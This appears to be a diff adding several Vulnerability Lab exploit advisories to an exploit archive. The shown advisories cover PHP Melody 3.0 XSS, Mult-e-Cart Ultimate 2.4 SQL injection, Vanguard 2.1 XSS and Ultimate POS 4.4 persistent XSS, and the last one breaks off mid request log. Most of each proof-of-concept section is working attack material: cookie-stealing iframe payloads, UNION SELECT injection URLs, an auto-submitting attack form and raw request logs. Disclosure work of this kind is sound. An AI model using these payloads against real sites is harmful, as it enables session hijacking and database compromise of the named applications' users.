+
+
+Disclosure Type:
+================
+Responsible Disclosure
+
+
+Technical Details & Description:
+================================
+A persistent input validation web vulnerability has been discovered in PHP Melody v3.0 video cms web-application.
+The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to
+compromise browser to web-application requests from the application-side.
+
+The persistent cross site web vulnerability is located in the video editor (WYSIWYG) with the tinymce class.
+Privileged user accounts like edtiors are able to inject own malicious script code via editor to provoke a
+public execution by users oder administrators. The request method to inject is get and after save in dbms
+via post method the attack vector becomes persistent.
+
+Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent
+external redirects to malicious source and persistent manipulation of affected application modules.
+
+Request Method(s):
+[+] POST
+
+Vulnerable Module(s):
+[+] Editor - Videos (WYSIWYG - tinymce)
+
+Vulnerable File(s):
+[+] edit-episode.php
+
+Vulnerable Parameter(s):
+[+] episode_id
+
+Affected Module(s):
+[+] description
+
+
+Proof of Concept (PoC):
+=======================
+The persistent validation vulnerability can be exploited by remote attackers with privileged editor user account and with low user interaction.
+For security demonstration or to reproduce the web vulnerability follow the provided information and steps below to continue.
+
+PoC: Payload
+<p><a title=""><iframe src="//phpmelody.localhost.com:8080/admin/[PWND]">">">"
+href="https://phpmelody.localhost.com:8080/admin/"><iframe%20src=evil.source onload=alert(document.cookie)>">">">">"></iframe></a></p>
+
+
+--- PoC Session Logss (GET) [WYSIWYG] ---
+https://phpmelody.localhost.com:8080/admin/[PWND]
+Host: phpmelody.localhost.com:8080
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Connection: keep-alive
+Referer: https://phpmelody.localhost.com:8080/admin/edit-episode.php?episode_id=1
+Cookie: PHPSESSID=aac20732ffd23b7d11815fa2b8f2e12a; melody_d900e07810ba03257e53baf46a9ada6f=admin;
+melody_key_d900e07810ba03257e53baf46a9ada6f=cc33e6eb60d2c1e31a5612bd8c193c88;
+cookieconsent_dismissed=yes; sidebar-main-state=maxi; watched_video_list=MSw0LDUsNw%3D%3D;
+pm_elastic_player=normal; aa_import_from=youtube; guest_name_d900e07810ba03257e53baf46a9ada6f=admin
+-
+GET: HTTP/2.0 200 OK
+content-type: text/html;
+vary: Accept-Encoding
+
+
+Vulnerable Source: Video Editor (WYSIWYG - tinymce)
+<textarea name="description" cols="100" id="textarea-WYSIWYG" class="tinymce" style="display: none;"
+aria-hidden="true"><p><test title=""><iframe src="//phpmelody.localhost.com:8080/admin/evil.source">">">"
+  href="https://phpmelody.localhost.com:8080/admin/"><iframe%20src=evil.source onload=alert(document.cookie)>">">">">"></iframe></a></p></textarea>
+<span class="autosave-message"></span>
+</div></div>
+
+
+Reference(s):
+https://phpmelody.localhost.com:8080/admin/
+https://phpmelody.localhost.com:8080/admin/edit-episode.php
+https://phpmelody.localhost.com:8080/admin/edit-episode.php?episode_id=1
+
+
+Solution - Fix & Patch:
+=======================
+Encode and sanitize the input description parameter of the web editor tinymce class for moderators, editors or users to prevent attacks.
+
+
+Credits & Authors:
+==================
+Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
+either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
+or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
+or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
+not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
+We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
+
+Domains:    www.vulnerability-lab.com		www.vuln-lab.com				www.vulnerability-db.com
+Services:   magazine.vulnerability-lab.com	paste.vulnerability-db.com 			infosec.vulnerability-db.com
+Social:	    twitter.com/vuln_lab		facebook.com/VulnerabilityLab 			youtube.com/user/vulnerability0lab
+Feeds:	    vulnerability-lab.com/rss/rss.php 	vulnerability-lab.com/rss/rss_upcoming.php 	vulnerability-lab.com/rss/rss_news.php
+Programs:   vulnerability-lab.com/submit.php 	vulnerability-lab.com/register.php  vulnerability-lab.com/list-of-bug-bounty-programs.php
+
+Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
+Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
+media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
+information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
+edit our material contact (admin@ or research@) to get a ask permission.
+
+				    Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™
+
+
+
+--
+VULNERABILITY LABORATORY (VULNERABILITY LAB)
+RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
+LUDWIG-ERHARD STRAßE 4
+34131 KASSEL - HESSEN
+DEUTSCHLAND (DE)
\ No newline at end of file
diff --git a/exploits/php/webapps/50489.txt b/exploits/php/webapps/50489.txt
new file mode 100644
index 000000000..3454992a3
--- /dev/null
+++ b/exploits/php/webapps/50489.txt
@@ -0,0 +1,264 @@
+# Exploit Title: Mult-e-Cart Ultimate 2.4 - 'id' SQL Injection
+# Date: 2021-10-22
+# Exploit Author: Vulnerability Lab
+# Vendor Homepage: https://multecart.com/
+# Version: 2.4
+
+Document Title:
+===============
+Mult-e-Cart Ultimate v2.4 - SQL Injection Vulnerability
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2306
+
+
+Release Date:
+=============
+2021-10-22
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2306
+
+
+Common Vulnerability Scoring System:
+====================================
+7
+
+
+Vulnerability Class:
+====================
+SQL Injection
+
+
+Current Estimated Price:
+========================
+1.000€ - 2.000€
+
+
+Product & Service Introduction:
+===============================
+Digital Multivendor Marketplace Online Store - eShop CMS
+
+(Source: https://ultimate.multecart.com/ & https://www.techraft.in/ )
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered multiple sql-injection web vulnerabilities in the Mult-e-Cart Ultimate v2.4 (v2021) web-application.
+
+
+Affected Product(s):
+====================
+Techraft
+Product: Digital Multivendor Marketplace Online Store v2.4 - eShop CMS (Web-Application)
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2021-10-22: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+High
+
+
+Authentication Type:
+====================
+Restricted Authentication (Moderator Privileges)
+
+
+User Interaction:
+=================
+No User Interaction
+
+
+Disclosure Type:
+================
+Independent Security Research
+
+
+Technical Details & Description:
+================================
+Multiple classic sql-injection web vulnerabilities has been discovered in the Mult-e-Cart Ultimate v2.4 (v2021) web-application.
+The web vulnerability allows remote attackers to inject or execute own sql commands to compromise the database management system.
+
+The vulnerabilities are located in the `id` parameter of the `view` and `update` function. The vulnerable modules are `inventory`,
+`customer`, `vendor` and `order`. Remote attackers with a vendor shop account are able to exploit the vulnerable id parameter to
+execute malicious sql commands. The request method to inject is get and the attack vector is located on the client-side. The remote
+vulnerability is a classic order by sql-injection. The issue is exploitable with one of the two vendor roles or higher privileged
+roles like admin.
+
+Exploitation of the remote sql injection vulnerabilities requires no user interaction and a privileged vendor- or admin role user account.
+Successful exploitation of the remote sql injection results in database management system, web-server and web-application compromise.
+
+Request Method(s):
+[+] GET
+
+Vulnerable Module(s):
+[+] inventory/inventory/update
+[+] /customer/customer/view
+[+] /vendor/vendor/view
+[+] /order/sub-order/view-order
+
+Vulnerable Parameter(s):
+[+] id
+
+
+Proof of Concept (PoC):
+=======================
+The remote sql injection web vulnerabilities can be exploited by remote attackers with privileged backend panel access without user interaction.
+For security demonstration or to reproduce the remote sql-injection web vulnerability follow the provided information and steps below to continue.
+
+
+PoC: Payloads
+1' union select 1,2,3,4,@@version--&edit=t
+1' union select 1,2,3,4,@@database--&edit=t
+
+
+PoC: Exploitation
+https://multecartultimate.localhost:8080/inventory/inventory/update?id=1' union select 1,2,3,4,5--&edit=t
+https://multecartultimate.localhost:8080/customer/customer/view?id=1' union select 1,2,3,4,5--&edit=t
+https://multecartultimate.localhost:8080/vendor/vendor/view?id=1' union select 1,2,3,4,5--&edit=t
+https://multecartultimate.localhost:8080/order/sub-order/view-order?id=' union select 1,2,3,4,5
+-
+https://multecartultimate.localhost:8080/inventory/inventory/update?id=1' union select 1,2,3,4,5&edit=t
+https://multecartultimate.localhost:8080/customer/customer/view?id=1' union select 1,2,3,4,5&edit=t
+https://multecartultimate.localhost:8080/vendor/vendor/view?id=1' union select 1,2,3,4,5&edit=t
+https://multecartultimate.localhost:8080/order/sub-order/view-order?id=' union select 1,2,3,4,5
+
+
+PoC: Exploit
+<html>
+<head><body>
+<title>Mult-E-Cart Ultimate - SQL Injection PoC</title>
+<iframe="https://multecartultimate.localhost:8080/inventory/inventory/update?id=1' union select 1,2,3,4,@@database--&edit=t" width="400" height="400"><br>
+<iframe="https://multecartultimate.localhost:8080/customer/customer/view?id=1' union select 1,2,3,4,@@database--&edit=t" width="400" height="400"><br>
+<iframe="https://multecartultimate.localhost:8080/vendor/vendor/view?id=1' union select 1,2,3,4,@@database--&edit=t" width="400" height="400"><br>
+<iframe="https://multecartultimate.localhost:8080/order/sub-order/view-order?id=' union select 1,2,3,4,@@database--" width="400" height="400"><br>
+<br>
+<iframe="https://multecartultimate.localhost:8080/inventory/inventory/update?id=1' union select 1,2,3,4,@@version--&edit=t" width="400" height="400"><br>
+<iframe="https://multecartultimate.localhost:8080/customer/customer/view?id=1' union select 1,2,3,4,@@version--&edit=t" width="400" height="400"><br>
+<iframe="https://multecartultimate.localhost:8080/vendor/vendor/view?id=1' union select 1,2,3,4,@@version--&edit=t" width="400" height="400"><br>
+<iframe="https://multecartultimate.localhost:8080/order/sub-order/view-order?id=' union select 1,2,3,4,@@version--" width="400" height="400">
+</body></head>
+</html>
+
+
+--- SQL Error Exception Handling Logs ---
+SQLSTATE[42S22]: Column not found: 1054 Unknown column '100' in 'order clause'
+The SQL being executed was: SELECT * FROM `tbl_inventory` WHERE id=1 order by 100--
+-
+PDOException: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax;
+check the manual that corresponds to your MariaDB server version for the right syntax to use near ''' at line 1 in /home/test/MulteCart/vendor/yiisoft/yii2/db/Command.php:1299
+-
+Stack trace:
+#0 /home/test/MulteCart/vendor/yiisoft/yii2/db/Command.php(1299): PDOStatement->execute()
+#1 /home/test/MulteCart/vendor/yiisoft/yii2/db/Command.php(1165): yiidbCommand->internalExecute('SELECT * FROM `...')
+#2 /home/test/MulteCart/vendor/yiisoft/yii2/db/Command.php(421): yiidbCommand->queryInternal('fetch', NULL)
+#3 /home/test/MulteCart/vendor/yiisoft/yii2/db/Query.php(287): yiidbCommand->queryOne()
+#4 /home/test/MulteCart/vendor/yiisoft/yii2/db/ActiveQuery.php(304): yiidbQuery->one(NULL)
+#5 /home/test/MulteCartUltimate/multeback/modules/inventory/controllers/InventoryController.php(536): yiidbActiveQuery->one()
+#6 /home/test/MulteCartUltimate/multeback/modules/inventory/controllers/InventoryController.php(300): multebackmodulesinventorycontrollersInventoryController->findModel('-1'')
+#7 [internal function]: multebackmodulesinventorycontrollersInventoryController->actionUpdate('-1'')
+#8 /home/test/MulteCart/vendor/yiisoft/yii2/base/InlineAction.php(57): call_user_func_array(Array, Array)
+#9 /home/test/MulteCart/vendor/yiisoft/yii2/base/Controller.php(181): yiibaseInlineAction->runWithParams(Array)
+#10 /home/test/MulteCart/vendor/yiisoft/yii2/base/Module.php(534): yiibaseController->runAction('update', Array)
+#11 /home/test/MulteCart/vendor/yiisoft/yii2/web/Application.php(104): yiibaseModule->runAction('inventory/inven...', Array)
+#12 /home/test/MulteCart/vendor/yiisoft/yii2/base/Application.php(392): yiiwebApplication->handleRequest(Object(yiiwebRequest))
+#13 /home/test/MulteCartUltimate/multeback/web/index.php(153): yiibaseApplication->run()
+#14 {main}
+-
+Next yiidbException: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax;
+check the manual that corresponds to your MariaDB server version for the right syntax to use near ''' at line 1
+The SQL being executed was: SELECT * FROM `tbl_inventory` WHERE id=-1' in /home/test/MulteCart/vendor/yiisoft/yii2/db/Schema.php:678
+-
+Stack trace:
+#0 /home/test/MulteCart/vendor/yiisoft/yii2/db/Command.php(1304): yiidbSchema->convertException(Object(PDOException), 'SELECT * FROM `...')
+#1 /home/test/MulteCart/vendor/yiisoft/yii2/db/Command.php(1165): yiidbCommand->internalExecute('SELECT * FROM `...')
+#2 /home/test/MulteCart/vendor/yiisoft/yii2/db/Command.php(421): yiidbCommand->queryInternal('fetch', NULL)
+#3 /home/test/MulteCart/vendor/yiisoft/yii2/db/Query.php(287): yiidbCommand->queryOne()
+#4 /home/test/MulteCart/vendor/yiisoft/yii2/db/ActiveQuery.php(304): yiidbQuery->one(NULL)
+#5 /home/test/MulteCartUltimate/multeback/modules/inventory/controllers/InventoryController.php(536): yiidbActiveQuery->one()
+#6 /home/test/MulteCartUltimate/multeback/modules/inventory/controllers/InventoryController.php(300): multebackmodulesinventorycontrollersInventoryController->findModel('-1'')
+#7 [internal function]: multebackmodulesinventorycontrollersInventoryController->actionUpdate('-1'')
+#8 /home/test/MulteCart/vendor/yiisoft/yii2/base/InlineAction.php(57): call_user_func_array(Array, Array)
+#9 /home/test/MulteCart/vendor/yiisoft/yii2/base/Controller.php(181): yiibaseInlineAction->runWithParams(Array)
+#10 /home/test/MulteCart/vendor/yiisoft/yii2/base/Module.php(534): yiibaseController->runAction('update', Array)
+#11 /home/test/MulteCart/vendor/yiisoft/yii2/web/Application.php(104): yiibaseModule->runAction('inventory/inven...', Array)
+#12 /home/test/MulteCart/vendor/yiisoft/yii2/base/Application.php(392): yiiwebApplication->handleRequest(Object(yiiwebRequest))
+#13 /home/test/MulteCartUltimate/multeback/web/index.php(153): yiibaseApplication->run()
+#14 {main}
+Debug Array:
+[0] => 42000
+[1] => 1064
+[2] => You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''' at line 1
+-
+
+
+Reference(s):
+https://multecartultimate.localhost:8080/vendor/vendor/view
+https://multecartultimate.localhost:8080/customer/customer/view
+https://multecartultimate.localhost:8080/inventory/inventory/update
+https://multecartultimate.localhost:8080/order/sub-order/view-order
+
+
+Solution - Fix & Patch:
+=======================
+The vulnerability can be resolved by the following description ...
+1. Disable to display the sql errors for other users then the admin or pipe it into a local log file outside the panel ui
+2. Use a prepared statement to protect the query against further injection attacks
+3. Restrict the vulnerable id parameter to disallow usage of special chars of post and get method requests
+4. Encode and escape the id content on get method request with the id parameter
+
+
+Credits & Authors:
+==================
+Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
+either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
+or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
+or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
+not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
+We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
+
+Domains:    www.vulnerability-lab.com		www.vuln-lab.com				www.vulnerability-db.com
+Services:   magazine.vulnerability-lab.com	paste.vulnerability-db.com 			infosec.vulnerability-db.com
+Social:	    twitter.com/vuln_lab		facebook.com/VulnerabilityLab 			youtube.com/user/vulnerability0lab
+Feeds:	    vulnerability-lab.com/rss/rss.php 	vulnerability-lab.com/rss/rss_upcoming.php 	vulnerability-lab.com/rss/rss_news.php
+Programs:   vulnerability-lab.com/submit.php 	vulnerability-lab.com/register.php  vulnerability-lab.com/list-of-bug-bounty-programs.php
+
+Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
+Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
+media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
+information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
+edit our material contact (admin@ or research@) to get a ask permission.
+
+				    Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™
+
+
+
+--
+VULNERABILITY LABORATORY (VULNERABILITY LAB)
+RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
+LUDWIG-ERHARD STRAßE 4
+34131 KASSEL - HESSEN
+DEUTSCHLAND (DE)
\ No newline at end of file
diff --git a/exploits/php/webapps/50491.txt b/exploits/php/webapps/50491.txt
new file mode 100644
index 000000000..fcf82667f
--- /dev/null
+++ b/exploits/php/webapps/50491.txt
@@ -0,0 +1,222 @@
+# Exploit Title: Vanguard 2.1 - 'Search' Cross-Site Scripting (XSS)
+# Date: 2021-10-26
+# Exploit Author: Vulnerability Lab
+# Vendor Homepage: https://codecanyon.net/item/vanguard-marketplace-digital-products-php/20287975
+# Version: 2.1
+
+Document Title:
+===============
+Vanguard v2.1 - (Search) POST Inject Web Vulnerability
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2283
+
+
+Release Date:
+=============
+2021-10-26
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2283
+
+
+Common Vulnerability Scoring System:
+====================================
+4
+
+
+Vulnerability Class:
+====================
+Cross Site Scripting - Non Persistent
+
+
+Current Estimated Price:
+========================
+500€ - 1.000€
+
+
+Product & Service Introduction:
+===============================
+https://codecanyon.net/item/vanguard-marketplace-digital-products-php/20287975
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered a post inject web vulnerability in the Vanguard v2.1 cms web-application.
+
+
+Affected Product(s):
+====================
+VanguardInfini
+Product: Vanguard v2.1 - CMS (PHP) (Web-Application)
+
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2021-10-26: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+Medium
+
+
+Authentication Type:
+====================
+Pre Auth (No Privileges or Session)
+
+
+User Interaction:
+=================
+Low User Interaction
+
+
+Disclosure Type:
+================
+Responsible Disclosure
+
+
+Technical Details & Description:
+================================
+A non-persistent post inject web vulnerability has been discovered in the official Vanguard v2.1 cms web-application.
+The vulnerability allows remote attackers to inject malicious script code in post method requests to compromise user
+session data or to manipulate application contents for clients.
+
+The vulnerability is located in the phps_query parameter of the search module. The vulnerability is a classic post
+injection web vulnerability with non-persistent attack vector.
+
+Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent
+external redirects to malicious source and non-persistent manipulation of affected application modules.
+
+Request method(s):
+[+] POST
+
+Vulnerable Input(s):
+[+] Search
+
+Vulnerable Parameter(s):
+[+] phps_query
+
+
+Proof of Concept (PoC):
+=======================
+The client-side post inject web vulnerability can be exploited by remote attackers without account and with low or medium user interaction.
+For security demonstration or to reproduce the cross site web vulnerability follow the provided information and steps below to continue.
+
+
+Vulnerable Source: search
+<div class="ui yellow basic segment"></div>
+<div class="ui container" style="margin-top: -0.7em;">
+<form method="POST" action="https://vanguard.squamifer.ovh/search">
+<div class="ui action input fluid">
+<input name="phps_query" type="text" value=""><iframe src=a onload=alert(document.cookie)>" placeholder="Search for a product...">
+<button class="ui button" type="submit" name="phps_search"><i class="search icon"></i>Search</button></div></form>
+<div class="ui divider"></div>
+<div class="ui cards aligned centered">
+<div class="alert color blue-color"><div class="ui hidden divider"></div>
+<div class="ui icon info message"><i class="help circle icon"></i><div class="content">
+<div class="header">No results found for <strong><iframe src=evil.source onload=alert(document.cookie)></strong>.</div></div></div></div>
+</div></div></div>
+
+
+--- PoC Session Logs [POST] ---
+https://vanguard.localhost:8080/search
+Host: vanguard.localhost:8080
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 86
+Origin: https://vanguard.localhost:8080
+Connection: keep-alive
+Referer: https://vanguard.localhost:8080/
+Cookie: PHPSESSID=57d86e593a55e069d1e6c728ce20b3b8
+phps_query=">%20<iframe src=evil.source onload=alert(document.cookie)>&phps_search=;)
+-
+POST: HTTP/2.0 200 OK
+content-type: text/html; charset=UTF-8
+pragma: no-cache
+cache-control: private
+vary: Accept-Encoding
+
+
+Exploitation: PoC
+<html>
+<head>
+<title>PoC</title>
+<style type="text/css">
+#nodisplay {
+display:none;
+}
+</style>
+</head>
+<body>
+<div id="nodsiplay">
+<form action="https://vanguard.localhost:8080/search" method="post">
+<input type="text" name="phps_query" value=">%20<iframe src=evil.source onload=alert(document.cookie)>"/>
+</form>
+</div>
+<script>
+function submitForm() {
+document.forms[0].submit();
+}
+submitForm();
+</script>
+</body>
+</html>
+
+
+Security Risk:
+==============
+The security risk of the validation web vulnerability in the web-application is estimated as medium.
+
+
+Credits & Authors:
+==================
+Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
+either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
+or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
+or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
+not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
+We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
+
+Domains:    www.vulnerability-lab.com		www.vuln-lab.com				www.vulnerability-db.com
+Services:   magazine.vulnerability-lab.com	paste.vulnerability-db.com 			infosec.vulnerability-db.com
+Social:	    twitter.com/vuln_lab		facebook.com/VulnerabilityLab 			youtube.com/user/vulnerability0lab
+Feeds:	    vulnerability-lab.com/rss/rss.php 	vulnerability-lab.com/rss/rss_upcoming.php 	vulnerability-lab.com/rss/rss_news.php
+Programs:   vulnerability-lab.com/submit.php 	vulnerability-lab.com/register.php  vulnerability-lab.com/list-of-bug-bounty-programs.php
+
+Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
+Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
+media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
+information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
+edit our material contact (admin@ or research@) to get a ask permission.
+
+				    Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™
+
+
+
+--
+VULNERABILITY LABORATORY (VULNERABILITY LAB)
+RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
+LUDWIG-ERHARD STRAßE 4
+34131 KASSEL - HESSEN
+DEUTSCHLAND (DE)
\ No newline at end of file
diff --git a/exploits/php/webapps/50492.txt b/exploits/php/webapps/50492.txt
new file mode 100644
index 000000000..f5a15baad
--- /dev/null
+++ b/exploits/php/webapps/50492.txt
@@ -0,0 +1,257 @@
+# Exploit Title: Ultimate POS 4.4 - 'name' Cross-Site Scripting (XSS)
+# Date: 2021-10-26
+# Exploit Author: Vulnerability Lab
+# Vendor Homepage: https://ultimatefosters.com/docs/ultimatepos/
+# Version: 4.4
+
+
+Document Title:
+===============
+Ultimate POS v4.4 - (Products) Persistent XSS Vulnerability
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2296
+
+
+Release Date:
+=============
+2021-10-26
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2296
+
+
+Common Vulnerability Scoring System:
+====================================
+5.6
+
+
+Vulnerability Class:
+====================
+Cross Site Scripting - Persistent
+
+
+Current Estimated Price:
+========================
+500€ - 1.000€
+
+
+Product & Service Introduction:
+===============================
+The Ultimate POS is a erp, stock management, point of sale & invoicing web-application.
+The application uses a mysql database management system in combination with php 7.2.
+
+(Copy of the Homepage: https://ultimatefosters.com/docs/ultimatepos/ )
+
+
+
+Abstract Advisory Information:
+==============================
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered a non-persistent cross site vulnerability in the Ultimate POS v4.4 erp stock management web-application.
+
+
+Affected Product(s):
+====================
+thewebfosters
+Ultimate POS v4.4 - ERP (Web-Application)
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2021-10-26: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+Medium
+
+
+Authentication Type:
+====================
+Restricted Authentication (Moderator Privileges)
+
+
+User Interaction:
+=================
+Low User Interaction
+
+
+Disclosure Type:
+================
+Responsible Disclosure
+
+
+Technical Details & Description:
+================================
+A persistent cross site web vulnerability has been discovered in the Ultimate POS v4.4 erp stock management web-application.
+The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise
+browser to web-application requests from the application-side.
+
+The persistent validation web vulnerability is located in the name parameter of the add products module.
+Remote attackers with privileges as vendor to add products are able to inject own malicious script codes.
+The request method to inject is post and the attack vector is persistent. Injects are possible via edit
+or by a new create of a product.
+
+Successful exploitation of the vulnerabilities results in session hijacking, persistent phishing attacks,
+persistent external redirects to malicious source and persistent manipulation of affected application modules.
+
+Request Method(s):
+[+] POST
+
+Vulnerable Module(s):
+[+] Products (Add)
+
+Vulnerable Input(s):
+[+] Product Name
+
+Vulnerable Parameter(s):
+[+] name
+
+Affected Module(s):
+[+] Products List
+
+
+Proof of Concept (PoC):
+=======================
+The persistent web vulnerability can be exploited by remote attackers with privileged application account and with low user interaction.
+For security demonstration or to reproduce the cross site web vulnerability follow the provided information and steps below to continue.
+
+
+PoC: Payload
+test"><iframe src="evil.source" onload=alert(document.cookie)></iframe>
+test"><img src="evil.source" onload=alert(document.cookie)></img>
+
+
+---- PoC Session Logs (POST) [Add] ---
+https://pos-uf.localhost.com:8000/products
+Host: pos-uf.localhost.com:8000
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Content-Type: multipart/form-data; boundary=---------------------------241608710739044240961361918599
+Content-Length: 3931
+Origin: https://pos-uf.localhost.com:8000
+Connection: keep-alive
+Referer: https://pos-uf.localhost.com:8000/products/create
+Cookie: ultimate_pos_session=eyJpdiI6InpjMmNRMEkycnU3MDIzeksrclNrWlE9PSIsInZhbHVlIjoiYmJWVjFBZWREODZFN3BCQ3praHZiaVwvV
+nhSMGQ1ZmM1cVc0YXZzOUg1YmpMVlB4VjVCZE5xMlwvNjFCK056Z3piIiwibWFjIjoiNmY3YTNiY2Y4MGM5NjQwNDYxOTliN2NjZWUxMWE4YTNhNmQzM2U2ZGRlZmI3OWU4ZjkyNWMwMGM2MDdkMmI3NSJ9
+_token=null&name=test"><iframe src=evil.source onload=alert(document.cookie)></iframe>&sku=&barcode_type=C128&unit_id=1&brand_id=
+&category_id=&sub_category_id=&product_locatio[]=1&enable_stock=1&alert_quantity=&product_description=&image=&product_brochure=
+&weight=&product_custom_field1=&product_custom_field2=&product_custom_field3=&product_custom_field4=&woocommerce_disable_sync=0&tax=&tax_type=exclusive
+&type=single&single_dpp=2.00&single_dpp_inc_tax=2.00&profit_percent=25.00&single_dsp=2.50&single_dsp_inc_tax=2.50&variation_images[]=&submit_type=submit
+-
+POST: HTTP/3.0 200 OK
+content-type: text/html; charset=UTF-8
+location: https://pos-uf.localhost.com:8000
+set-cookie: ultimate_pos_session=eyJpdiI6IndzZmlwa1ppRGZkaUVlUU1URTgwT1E9PSIsInZhbHVlIjoiMklXdGZWa250THhtTCtrMnhEU2I3UlAyXC8ydmdqSU5NcTJLZTVpR2FxYUptb
+khvdjhMR0pmYW13Unorc2VuNHEiLCJtYWMiOiJkYWMyYTY3Y2ExNjI0NTdlY2Y2YzhlNTk4ZmZiZjQzZGYwMTRmYjBlYmJiNjA1MzZjNjYyNmVjOGEzNjVmMzczIn0%3D; Max-Age=7200; path=/; httponly
+
+
+---- PoC Session Logs (POST) [Edit] ---
+https://pos-uf.localhost.com:8000/products/23
+Host: pos-uf.localhost.com:8000
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Content-Type: multipart/form-data; boundary=---------------------------407073296625600179063246902867
+Content-Length: 4064
+Origin: https://pos-uf.localhost.com:8000
+Connection: keep-alive
+Referer: https://pos-uf.localhost.com:8000/products/23/edit
+Cookie: ultimate_pos_session=eyJpdiI6IlhwOTR3NmxwMmNvbWU0WlI3c3B6R1E9PSIsInZhbHVlIjoiWkV5XC80Uk53b3daaXM1V3pOYXp6ZzFTdEhnejVXcUdF
+Q2lkUFl4WTk4dXNhQ2plUnpxWmFjYzE0bTJLQnAyVXQiLCJtYWMiOiI1OTQxZGIzMDU1NzQyNDA1YTQ3N2YyZTdjMWYyZTg0NmE1MGU0YTQ2ODc0MTg4ZTlmNmIwYzljMTBmZGUwNzE0In0%3D
+_method=PUT&_token=null&name=test_products"><iframe src=evol.source onload=alert(document.cookie)></iframe>&sku=2&barcode_type=C128&unit_id=1&brand_id=&category_id=&sub_category_id=&product_locations[]=1&enable_stock=1&alert_quantity=2.00&product_description=&image=&product_brochure=&weight=4&product_custom_field1=3&product_custom_field2=5&product_custom_field3=1&product_custom_field4=2
+&woocommerce_disable_sync=0&tax=&tax_type=exclusive&single_variation_id=204&single_dpp=1.00&single_dpp_inc_tax=1.00
